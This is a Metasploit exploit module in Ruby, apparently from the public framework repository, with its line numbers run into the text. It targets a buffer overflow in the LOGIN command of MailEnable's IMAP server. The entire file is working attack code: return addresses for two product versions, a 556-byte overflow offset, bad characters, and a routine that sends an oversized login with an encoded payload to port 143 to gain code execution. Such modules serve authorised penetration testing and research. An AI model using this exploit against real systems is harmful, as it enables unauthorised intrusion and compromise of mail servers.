Path: blob/master/modules/exploits/windows/imap/mailenable_login.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',15'Description' => %q{16MailEnable's IMAP server contains a buffer overflow17vulnerability in the Login command.18},19'Author' => [ 'MC' ],20'License' => MSF_LICENSE,21'References' => [22[ 'CVE', '2006-6423'],23[ 'OSVDB', '32125'],24[ 'BID', '21492']25],26'Privileged' => true,27'DefaultOptions' => {28'EXITFUNC' => 'thread',29},30'Payload' => {31'Space' => 450,32'BadChars' => "\x00\x0a\x0d\x20",33'StackAdjustment' => -3500,34},35'Platform' => 'win',36'Targets' => [3738[39'MailEnable 2.35 Pro',40{41'Ret' => 0x10049abb,42}43], # MEAISP.DLL4445[46'MailEnable 2.34 Pro',47{48'Ret' => 0x76095d68,49'Offset' => 556,50}51], # push esp # ret | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]52],53'DisclosureDate' => '2006-12-11',54'DefaultTarget' => 0,55'Notes' => {56'Reliability' => UNKNOWN_RELIABILITY,57'Stability' => UNKNOWN_STABILITY,58'SideEffects' => UNKNOWN_SIDE_EFFECTS59}60)61)6263register_options([ Opt::RPORT(143) ])64end6566def exploit67connect6869auth = "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"70sploit = rand_text_alpha_upper(556) + [target.ret].pack('V')71sploit << payload.encoded + "\r\n\r\n"7273res = sock.recv(50)74if (res =~ / OK IMAP4rev1/)75print_status("Trying target #{target.name}...")76sock.put(auth)77sock.get_once(-1, 3)78sock.put(sploit)79else80print_status("Not running IMAP4rev1...")81end8283handler84disconnect85end86end878889